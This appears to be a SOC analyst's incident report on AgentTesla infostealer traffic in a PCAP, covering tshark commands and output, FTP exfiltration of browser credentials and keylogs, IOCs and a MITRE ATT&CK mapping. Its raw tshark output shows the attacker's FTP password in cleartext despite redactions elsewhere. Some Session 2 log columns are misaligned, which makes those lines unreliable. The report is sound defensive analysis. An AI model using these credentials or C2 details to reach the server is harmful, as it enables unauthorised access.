

NETWORK INVESTIGATION REPORT

AgentTesla FTP Exfiltration: Phase 2 Analysis

CONFIDENTIAL | SOC ANALYSIS REPORT | TLP:RED

Organisation	Globex Manufacturing Ltd.
Incident Date	December 4, 2024
Report Author	Ukah Paul — SOC Analyst
Evidence File	2024-12-04-AgentTesla-variant-using-FTP.pcap
Tools Used	tshark, Wireshark
Suspected Malware	AgentTesla: Information Stealer

⚠ CRITICAL — Active Exfiltration Confirmed

AgentTesla malware executed on host DESKTOP-VJCRXEB (10.12.4.101). The malware performed public IP reconnaissance, resolved a hardcoded FTP C2 server, and exfiltrated four files containing browser credentials and keylog data over cleartext FTP (port 21). Total data stolen: ~38 KB across 2 automated sessions.

01 | INFECTED HOST IDENTIFICATION

Protocol Distribution — Traffic Overview

The PCAP capture spans 182 frames (53,464 bytes). FTP dominates — 42 control frames and 27 data frames confirm active file exfiltration, not routine browsing or update traffic.

Protocol	Frames	Bytes	Significance
Total (All)	182	53,464	Full capture scope
DNS (UDP)	6	574	3 queries + 3 responses — minimal, deliberate
TLS (HTTPS)	7	4,277	Single HTTPS session — public IP lookup via api.ipify.org
FTP Control	42	4,354	2 complete sessions on port 21 — cleartext credentials
FTP Data	27	38,747	4 files exfiltrated — ~38 KB of stolen data

[Protocol Hierarchy Overview]

```
(paul@kali)-[~/SOC/Capstone Project/AgentTesla]
$ tshark -r 2024-12-04-AgentTesla-variant-using-FTP.pcap -q -z io,phs

=====
Protocol Hierarchy Statistics
Filter:

frame                frames:182 bytes:53464
  eth                frames:182 bytes:53464
    ip               frames:182 bytes:53464
      udp            frames:6 bytes:574
        dns          frames:6 bytes:574
      tcp            frames:176 bytes:52890
        tls          frames:7 bytes:4277
          tls        frames:1 bytes:1317
            ftp       frames:42 bytes:4354
              ftp-data frames:27 bytes:38747
                data-text-lines frames:3 bytes:3448
=====
```

IP Conversation Analysis

IP Address	Role	Frames	Justification
10.12.4.101	VICTIM — Infected Workstation	157	Sole internal host; initiates all DNS queries and both FTP sessions
192.254.225.136	ATTACKER — FTP Exfil Server	157	Receives all STOR uploads; resolved from ftp.ercolina-usa.com
10.12.4.1	Internal DNS / Gateway	6	Responds to DNS queries only — no suspicious behaviour

IP Address	Role	Frames	Justification
172.67.74.152	api.ipify.org (Cloudflare)	19	Victim public IP lookup — HTTPS; first contact post-execution

[IP Conversation Results]

```

[~(paul@kali)-[~/SOC/Capstone Project/AgentTesla]
└─$ tshark -r 2024-12-04-AgentTesla-variant-using-FTP.pcap -q -z conv,ip
=====
IPv4 Conversations
Filter:<No Filter>
=====

```

		<-		->		Total		Relative	Duration
		Frames	Bytes	Frames	Bytes	Frames	Bytes	Start	
10.12.4.101	<-> 192.254.225.136	82	6,065 bytes	75	41 kB	157	47 kB	6.317201000	1206.1609
10.12.4.101	<-> 172.67.74.152	10	3,997 bytes	9	944 bytes	19	4,941 bytes	0.049197000	100.3895
10.12.4.101	<-> 10.12.4.1	3	341 bytes	3	233 bytes	6	574 bytes	0.000000000	1211.3690

```

=====

```

Confirmed Victim Profile

Property	Value	Evidence Source
Victim IP Address	10.12.4.101	tshark conv,ip — highest volume internal IP
Victim Hostname	DESKTOP-VJCRXEB	AgentTesla exfil filenames — embedded by malware
OS Username	gary.strickman	AgentTesla exfil filenames — embedded by malware
Operating System	Microsoft Windows 11 Pro	PW_ exfil file content header
CPU	Intel Core i7-14700K	PW_ exfil file content header
RAM	16,383 MB	PW_ exfil file content header
Victim Public IP	173.66.46.97	Returned by api.ipify.org at T+0

First Signs of Compromise

The following sequence confirms victim identity and establishes the precise order of malicious activity from the moment of execution:

Offset	Absolute Time (UTC)	Event	Significance
T+0.000s	21:20:50	DNS → api.ipify.org	First packet from victim — malware fingerprinting external IP
T+0.050s	21:20:50	TLS session → 172.67.74.152	Victim public IP (173.66.46.97) returned to malware
T+6.122s	21:20:56	DNS → ftp.ercolina-usa.com	C2/exfil server resolution begins
T+6.317s	21:20:56	TCP SYN → 192.254.225.136:21	FTP Session 1 initiated — exfiltration imminent

02 | DNS FINDINGS

Key Observation

Only 3 DNS queries in 20+ minutes — zero background noise. This confirms the workstation was running only AgentTesla during the capture window. Every query was deliberate and malware-driven.

DNS Query Log — All Queries from Victim (10.12.4.101)

Rel. Time	Source IP	Domain Queried	Purpose / MITRE
T+0.000s	10.12.4.101	api.ipify.org	Public IP discovery before exfil — MITRE T1016
T+6.122s	10.12.4.101	ftp.ercolina-usa.com	FTP exfil server — Session 1 about to open
T+1211.313s	10.12.4.101	ftp.ercolina-usa.com	FTP re-resolution — Session 2 beacon (~20 min interval)

[DNS Query Extraction]

```

(paul@kali)~[~/SOC/Capstone Project/AgentTesla]
$ tshark -r 2024-12-04-AgentTesla-variant-using-FTP.pcap -T fields -e frame.time_relative -e ip.src -e dns.qry.name -Y "dns.flags.response == 0"
0.000000000 10.12.4.101 api.ipify.org
6.122416000 10.12.4.101 ftp.ercolina-usa.com
1211.312537000 10.12.4.101 ftp.ercolina-usa.com
(paul@kali)~[~/SOC/Capstone Project/AgentTesla]
$

```

DNS Response Analysis: Resolved IPs

Domain Queried	Resolved IP(s)	Analysis
api.ipify.org	172.67.74.152 / 104.26.12.205 / 104.26.13.205	Legitimate public IP service — abused by AgentTesla to profile network location pre-exfiltration
ftp.ercolina-usa.com	192.254.225.136	Attacker-controlled FTP server — receives all stolen data

[DNS Response Extraction]

```
(paul@kali)-[~/SOC/Capstone Project/AgentTesla]
$ tshark -r 2024-12-04-AgentTesla-variant-using-FTP.pcap \
  -Y "dns.flags.response == 1" \
  -T fields -e frame.time_relative -e dns.qry.name -e dns.a

0.039953000    api.ipify.org    172.67.74.152,104.26.12.205,104.26.13.205
6.315643000    ftp.ercolina-usa.com    192.254.225.136
1211.368976000 ftp.ercolina-usa.com    192.254.225.136
```

DNS Analyst Summary

- Only 3 DNS queries; no browser activity or software update noise; confirms isolated malware-only execution.
- api.ipify.org queried at T+0 before any FTP connection documented AgentTesla first action: discover external IP, embed in exfil metadata.
- ftp.ercolina-usa.com queried exactly twice once per FTP session; consistent with AgentTesla re-resolving before each beacon.
- 1,211-second gap between the two ftp.ercolina-usa.com queries confirms the ~20-minute automated beacon interval.
- No DGA (Domain Generation Algorithm) patterns detected ;AgentTesla uses a hardcoded C2 configuration.

03 | FTP TRAFFIC ANALYSIS

⚠ DATA EXFILTRATION CONFIRMED — Cleartext FTP Port 21

AgentTesla transmitted all stolen credentials and keylog data over unencrypted FTP. Every command — including the FTP username and password — is visible in plain text on the wire. All four exfiltrated files have been recovered from the PCAP.

FTP Server Profile

Property	Value
FTP Server Domain	ftp.ercolina-usa.com
FTP Server IP	192.254.225.136
FTP Port	21 — Cleartext, NO TLS encryption
Server Software	Pure-FTPd [privsep] [TLS] — banner exposed in 220 responses
FTP Username	ben@ercolina-usa.com — transmitted in cleartext USER command
FTP Password	[REDACTED — visible in cleartext PASS command]
Total Sessions	2 (Session 1 at T+6s, Session 2 at T+1,211s)
Total Files Exfiltrated	4 files across both sessions
Total Data Volume	~38 KB of stolen credentials and keylog data

Session 1 — Full Command Reconstruction (T+6s to T+9s)

FTP runs entirely in cleartext. The following control channel exchange was reconstructed verbatim from tshark field output.

Time	Direction	Command / Response	Significance
T+6.317s	Server → Client	220 Welcome to Pure-FTPd [privsep] [TLS]	FTP server banner — server software fingerprinted
T+6.480s	Client → Server	USER ben@ercolina-usa.com	⚠ Attacker FTP username — cleartext
T+6.558s	Server → Client	331 Password required for ben@ercolina-usa.com	Server confirms username accepted
T+6.559s	Client → Server	PASS [REDACTED]	⚠ Password transmitted cleartext on port 21
T+6.750s	Server → Client	230 OK — Current restricted directory is /	Login successful — exfiltration begins
T+6.988s	Server → Client	200 TYPE is now 8-bit binary	Binary transfer mode set
T+7.158s	Client → Server	STOR PW_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_20_57.html	⚠ Password dump uploaded — 392 bytes
T+7.326s	Server → Client	226 File successfully transferred	Password dump confirmed on attacker server
T+8.180s	Client → Server	STOR CO_Chrome_Default.txt_...2024_12_04_21_21_03.txt	⚠ Chrome credentials uploaded — ~23 KB
T+8.452s	Server → Client	226 File successfully transferred	Chrome data confirmed on attacker server
T+8.619s	Client → Server	STOR CO_Edge Chromium_Default.txt_...2024_12_04_21_21_04.txt	⚠ Edge credentials uploaded — ~11 KB
T+8.824s	Server → Client	226 File successfully transferred	Edge data confirmed; Session 1 closing
T+9.1s	Client → Server	QUIT	FTP Session 1 closed cleanly

[FTP Session 1 — Full Command Reconstruction]

```

--(paul@kali):~/SOC/Capstone Project/AgentTesla)
$ tshark -r 2024-12-04-AgentTesla-variant-using-FTP.pcap -Y "ftp" -T fields -e frame.time_relative -e ip.src -e ip.dst -e ftp.request.command -e ftp.request.arg -e ftp.response.code -e ftp.response.arg

6.478610000  192.254.225.136 10.12.4.101      220  ----- Welcome to Pure-FTPd [privsep] [TLS] -----
6.480941000  10.12.4.101    192.254.225.136 331  User ben@ercolina-usa.com OK. Password required
6.559201000  192.254.225.136 10.12.4.101      331  User ben@ercolina-usa.com OK. Password required
6.559166000  10.12.4.101    192.254.225.136 PASS  nXe0M-WkwlunJ
6.750190000  192.254.225.136 10.12.4.101      230  OK. Current restricted directory is /
6.751115000  10.12.4.101    192.254.225.136 OPTS  utf8 on
6.835210000  192.254.225.136 10.12.4.101      504  Unknown command
6.836226000  10.12.4.101    192.254.225.136 PWD   "/"
6.912466000  192.254.225.136 10.12.4.101      257  "/" is your current location
6.912852000  10.12.4.101    192.254.225.136 TYPE  I
6.988589000  192.254.225.136 10.12.4.101      200  TYPE is now 8-bit binary
6.988959000  10.12.4.101    192.254.225.136 PASV
7.075060000  192.254.225.136 10.12.4.101      227  Entering Passive Mode (192,254,225,136,101,153)
7.158194000  10.12.4.101    192.254.225.136 STOR  PW_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_20_57.html
7.237745000  192.254.225.136 10.12.4.101      150  Accepted data connection
7.326060000  192.254.225.136 10.12.4.101      226  File successfully transferred
8.016398000  10.12.4.101    192.254.225.136 PASV
8.102946000  192.254.225.136 10.12.4.101      227  Entering Passive Mode (192,254,225,136,147,201)
8.180679000  10.12.4.101    192.254.225.136 STOR  CO_Chrome_Default.txt_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_21_03.txt
8.271257000  192.254.225.136 10.12.4.101      150  Accepted data connection
8.452447000  192.254.225.136 10.12.4.101      226  File successfully transferred
8.454928000  10.12.4.101    192.254.225.136 PASV
8.538199000  192.254.225.136 10.12.4.101      227  Entering Passive Mode (192,254,225,136,175,147)
8.619721000  10.12.4.101    192.254.225.136 STOR  CO_Edge Chromium_Default.txt_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_21_04.txt
8.699375000  192.254.225.136 10.12.4.101      150  Accepted data connection

```

Session 2 — Keylog Upload (T+1,211s — ~20 min later)

Twenty minutes after Session 1, AgentTesla opened a second FTP session to upload keylog data captured during the intervening period. The same hardcoded credentials were reused — consistent with AgentTesla's documented beacon behaviour.

Time	Direction	Command / Response	Significance
T+1211.548s	Server → Client	220 Welcome to Pure-FTPd [privsep] [TLS]	Session 2 opens — same server, same banner
T+1211.549s	Client → Server	USER ben@ercolina-usa.com	Same attacker credentials reused — cleartext
T+1211.634s	Client → Server	PASS [REDACTED]	⚠ Password again in cleartext — no rotation
T+1211.813s	Server → Client	230 OK	Login successful — Session 2 exfiltration begins
T+1212.249s	Client → Server	STOR KL_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_41_04.html	⚠ Keylog uploaded — ~1.4 KB of captured keystrokes
T+1212.425s	Server → Client	226 File successfully transferred	Keylog confirmed on attacker server — Session 2 complete

[FTP Session 2 — Keylog Upload]

```

8.699375000 192.254.225.136 10.12.4.101 150 Accepted data connection
8.824864000 192.254.225.136 10.12.4.101 226 File successfully transferred
1211.548976000 192.254.225.136 10.12.4.101 220 ----- Welcome to Pure-FTPd [privsep] [TLS] -----
1211.549252000 10.12.4.101 192.254.225.136 USER ben@ercolina-usa.com 331 User ben@ercolina-usa.com OK. Password required
1211.634055000 192.254.225.136 10.12.4.101 PASS nXe0M-WkWi6nJ 230 OK. Current restricted directory is /
1211.634306000 10.12.4.101 192.254.225.136 PASS utf8 on 504 Unknown command
1211.813853000 192.254.225.136 10.12.4.101 OPTS 257 "/" is your current location
1211.814074000 10.12.4.101 192.254.225.136 OPTS I 200 TYPE is now 8-bit binary
1211.889399000 192.254.225.136 10.12.4.101 PWD 227 Entering Passive Mode (192,254,225,136,189,80)
1211.889617000 10.12.4.101 192.254.225.136 PWD 150 Accepted data connection
1211.968465000 192.254.225.136 10.12.4.101 TYPE 226 File successfully transferred
1211.968912000 10.12.4.101 192.254.225.136 TYPE 150 Accepted data connection
1212.054431000 192.254.225.136 10.12.4.101 PASV 226 File successfully transferred
1212.054716000 10.12.4.101 192.254.225.136 PASV 150 Accepted data connection
1212.148777000 192.254.225.136 10.12.4.101 STOR KL_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_41_04.html 226 File successfully transferred
1212.249450000 10.12.4.101 192.254.225.136 STOR 150 Accepted data connection
1212.328391000 192.254.225.136 10.12.4.101 226 File successfully transferred
1212.425168000 192.254.225.136 10.12.4.101
    
```

Exfiltrated Files: All 4 Recovered from PCAP

Module	Filename	Size	Content
PW_	PW_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_20_57.html	392 B	Saved browser passwords from Edge — formatted as HTML
CO_	CO_Chrome_Default.txt_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_21_03.txt	~23 KB	Chrome saved credentials and session cookie store
CO_	CO_Edge Chromium_Default.txt_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_21_04.txt	~11 KB	Edge Chromium credentials and cookie store
KL_	KL_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_41_04.html	~1.4 KB	20 minutes of captured keystrokes — HTML format

[SCREENSHOT: Exfiltrated File Recovery]

```
(paul@kali)~[SOC/Capstone Project/AgentTesla/ftp_exports]
$ ls
CO_Chrome_Default.txt_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_21_03.txt
'CO_Edge Chromium_Default.txt_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_21_04.txt'
KL_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_41_04.html
PW_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_20_57.html

(paul@kali)~[SOC/Capstone Project/AgentTesla/ftp_exports]
$ ls -lh
total 44K
-rw-r--r-- 1 paul paul 24K May 29 11:23 CO_Chrome_Default.txt_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_21_03.txt
-rw-r--r-- 1 paul paul 12K May 29 11:23 'CO_Edge Chromium_Default.txt_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_21_04.txt'
-rw-r--r-- 1 paul paul 1.5K May 29 11:23 KL_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_41_04.html
-rw-r--r-- 1 paul paul 392 May 29 11:23 PW_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_20_57.html

171 1212.249430 10.12.4.101 → 192.254.225.136 FTP 119 Request: STOR KL_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_41_04.html
172 1212.249518 192.254.225.136 → 10.12.4.101 TCP 54 21 → 49889 [ACK] Seq=504 Ack=145 Win=64240 Len=0
173 1212.328391 192.254.225.136 → 10.12.4.101 FTP 84 Response: 150 Accepted data connection
174 1212.328676 10.12.4.101 → 192.254.225.136 FTP-DATA 1488 FTP Data: 1434 bytes (PASV) (STOR KL_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_41_04.html)
175 1212.328712 10.12.4.101 → 192.254.225.136 TCP 54 49890 → 48464 [FIN, ACK] Seq=1435 Ack=1 Win=65535 Len=0
176 1212.328756 192.254.225.136 → 10.12.4.101 TCP 54 48464 → 49890 [ACK] Seq=1 Ack=1435 Win=64240 Len=0
177 1212.328788 192.254.225.136 → 10.12.4.101 TCP 54 48464 → 49890 [ACK] Seq=1 Ack=1436 Win=64239 Len=0
178 1212.382170 10.12.4.101 → 192.254.225.136 TCP 54 49889 → 21 [ACK] Seq=145 Ack=534 Win=65002 Len=0
179 1212.425134 192.254.225.136 → 10.12.4.101 TCP 54 48464 → 49890 [FIN, PSH, ACK] Seq=1 Ack=1436 Win=64239 Len=0
180 1212.425168 192.254.225.136 → 10.12.4.101 FTP 149 Response: 226-File successfully transferred
181 1212.425361 10.12.4.101 → 192.254.225.136 TCP 54 49890 → 48464 [ACK] Seq=1436 Ack=2 Win=65535 Len=0
182 1212.478147 10.12.4.101 → 192.254.225.136 TCP 54 49889 → 21 [ACK] Seq=145 Ack=629 Win=64907 Len=0
total 44K
-rw-r--r-- 1 paul paul 24K May 29 11:23 CO_Chrome_Default.txt_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_21_03.txt
-rw-r--r-- 1 paul paul 12K May 29 11:23 'CO_Edge Chromium_Default.txt_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_21_04.txt'
-rw-r--r-- 1 paul paul 1.5K May 29 11:23 KL_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_41_04.html
-rw-r--r-- 1 paul paul 392 May 29 11:23 PW_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_20_57.html
```

AgentTesla Filename Convention — Decoded

Component	Example Value	Meaning
PREFIX_	PW_ / CO_ / KL_	Module: PW=Password CO=Cookie/Credential KL=Keylog
username	gary.strickman	Windows username — harvested at runtime by malware
-HOSTNAME	DESKTOP-VJCRXEB	Windows machine name — harvested at runtime
_YYYY_MM_DD	2024_12_04	Collection date — embedded by malware
_HH_MM_SS	21_20_57	Collection timestamp — precise to the second
.html / .txt	.html / .txt	File format of exfiltrated data

04 | IOC TABLE — NETWORK-BASED INDICATORS

4.1 Host Indicators

IOC Type	Value	Source	Confidence
Victim IP Address	10.12.4.101	tshark conv.ip	HIGH
Victim Hostname	DESKTOP-VJCRXEB	AgentTesla exfil filename	HIGH
Victim OS Username	gary.strickman	AgentTesla exfil filename	HIGH
Victim OS	Microsoft Windows 11 Pro	PW_ exfil file header	HIGH
Victim Public IP	173.66.46.97	api.ipify.org response	HIGH

4.2 DNS & Domain Indicators

IOC Type	Value	Source	Confidence
Domain — IP Discovery	api.ipify.org	tshark DNS — T+0.000s	HIGH
IP — api.ipify.org CDN	172.67.74.152	tshark DNS response	MED
Domain — FTP C2	ftp.ercolina-usa.com	tshark DNS — T+6.122s & T+1211.313s	HIGH
IP — FTP Exfil Server	192.254.225.136	tshark DNS + conv,ip	HIGH
C2 Beacon Interval	~20 min (1,211 seconds)	DNS re-query timestamp delta	HIGH

4.3 FTP & Credential Indicators

IOC Type	Value	Source	Confidence
FTP Server Domain	ftp.ercolina-usa.com	tshark DNS + FTP stream	HIGH
FTP Server IP	192.254.225.136	tshark conv,ip + FTP stream	HIGH
FTP Port	21 — Cleartext, No Encryption	tshark FTP filter	HIGH
FTP Server Banner	Pure-FTPd [privsep]	FTP 220 response	HIGH
FTP Username	ben@ercolina-usa.com	FTP USER command — cleartext	HIGH
FTP Password	[REDACTED — cleartext on wire]	FTP PASS command	HIGH

4.4 Exfiltrated File Indicators

Filename	Size	Module	Session
PW_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_20_57.html	392 B	Password Harvester	1
CO_Chrome_Default.txt_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_21_03.txt	~23 KB	Browser Stealer	1
CO_Edge Chromium_Default.txt_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_21_04.txt	~11 KB	Browser Stealer	1
KL_gary.strickman-DESKTOP-VJCRXEB_2024_12_04_21_41_04.html	~1.4 KB	Keylogger	2

05 | FULL ATTACK TIMELINE

Phase Overview

Phase	Time Window	Duration	Key Events
Email Delivery	12:51 UTC, Dec 4	—	Phishing email (PURCHASE QUOTATION) from sertan@acronas.com.tr (94.141.120.32)
Execution	~21:20 UTC, Dec 4	—	Victim opens TECHNICAL SPECIFICATIONS.TAR → executes .exe
Reconnaissance	T+0s to T+6s	6 seconds	Public IP via api.ipify.org; FTP C2 resolved via DNS
Session 1 — Exfil	T+6s to T+9s	~3 seconds	Browser passwords, Chrome & Edge credentials — 3 files, ~35 KB
Keylogging Window	T+9s to T+1211s	~20 minutes	AgentTesla keylogger silently capturing victim keystrokes
Session 2 — Exfil	T+1211s to T+1212s	~2 seconds	Keylog uploaded — 1 file, ~1.4 KB; capture ends

Complete Event-by-Event Timeline

#	Rel. Time	Abs. Time (UTC)	Event	MITRE	Evidence
1	—	12:51:16 Dec 4	Phishing email received — PURCHASE QUOTATION lure	T1566.001	Email header Received: timestamp
2	—	~21:20 Dec 4	Victim opens TAR → executes TECHNICAL SPECIFICATIONS.exe	T1204.002	Phase 1 analysis
3	T+0.000s	21:20:50	AgentTesla executes — DNS: api.ipify.org (IP discovery)	T1016	tshark DNS frame 1
4	T+0.050s	21:20:50	TLS → 172.67.74.152 — victim public IP returned	T1016	tshark TLS frames 2–10
5	T+6.122s	21:20:56	DNS: ftp.ercolina-usa.com — C2 server resolution	T1071.002	tshark DNS frames 18–19
6	T+6.317s	21:20:56	TCP SYN → 192.254.225.136:21 — FTP Session 1 opens	T1071.002	tshark FTP frame 20
7	T+6.480s	21:20:57	FTP USER ben@ercolina-usa.com — cleartext	T1071.002	tshark FTP USER cmd
8	T+6.559s	21:20:57	FTP PASS — password cleartext on port 21	T1071.002	tshark FTP PASS cmd
9	T+6.750s	21:20:57	FTP 230 Login OK — exfiltration window opens	T1041	tshark FTP 230
10	T+7.158s	21:20:57	STOR PW_*.html — browser passwords (392 B)	T1555	tshark STOR + export-objects
11	T+7.326s	21:20:57	226 Transfer complete — PW_ file confirmed on server	T1041	tshark FTP 226

#	Rel. Time	Abs. Time (UTC)	Event	MITRE	Evidence
12	T+8.180s	21:20:58	STOR CO_Chrome_*.txt — Chrome credentials (~23 KB)	T1555.003	tshark STOR + export-objects
13	T+8.452s	21:20:58	226 Transfer complete — Chrome data confirmed	T1041	tshark FTP 226
14	T+8.619s	21:20:59	STOR CO_Edge_*.txt — Edge credentials (~11 KB)	T1555.003	tshark STOR + export-objects
15	T+8.824s	21:20:59	226 Transfer complete — Edge data confirmed; Session 1 QUIT	T1041	tshark FTP 226 + QUIT
16	T+9s–T+1211s	21:21–21:41	AgentTesla keylogger active — 20 min of victim keystrokes	T1056.001	KL_ file timestamp gap
17	T+1211.313s	21:41:01	DNS re-query: ftp.ercolina-usa.com — Session 2 beacon	T1020	tshark DNS frame 143
18	T+1211.548s	21:41:02	TCP SYN → 192.254.225.136:21 — FTP Session 2 opens	T1071.002	tshark FTP Session 2 SYN
19	T+1211.549s	21:41:02	FTP USER + PASS — same credentials reused cleartext	T1071.002	tshark FTP Session 2 auth
20	T+1211.813s	21:41:02	230 Login OK — Session 2 exfiltration begins	T1041	tshark FTP 230 Session 2
21	T+1212.249s	21:41:04	STOR KL_*.html — 20 min keylog data (~1.4 KB)	T1056.001	tshark STOR + export-objects
22	T+1212.425s	21:41:04	226 Transfer complete — keylog on attacker server; FINAL FRAME	T1020	tshark FTP 226 — last frame

4.5 MITRE ATT&CK Mapping

Tactic	Technique	ID	Evidence
Discovery	System Network Configuration Discovery	T1016	api.ipify.org queried at T+0 — public IP retrieved before exfil
Discovery	System Information Discovery	T1082	Hostname + username auto-embedded in every exfil filename
Collection	Input Capture: Keylogging	T1056.001	KL_ file — 20 min HTML keylog dump of victim keystrokes
Collection	Credentials from Web Browsers	T1555.003	CO_Chrome_ and CO_Edge_ files — browser credential stores stolen
Collection	Credentials from Password Stores	T1555	PW_ file — saved browser password vault extracted
C2	Application Layer Protocol: FTP	T1071.002	Port 21 used as C2 channel — cleartext, no encryption
Exfiltration	Exfiltration Over C2 Channel	T1041	All stolen data uploaded via FTP STOR to 192.254.225.136
Exfiltration	Automated Exfiltration	T1020	Two timed sessions; consistent 20-min interval; no user interaction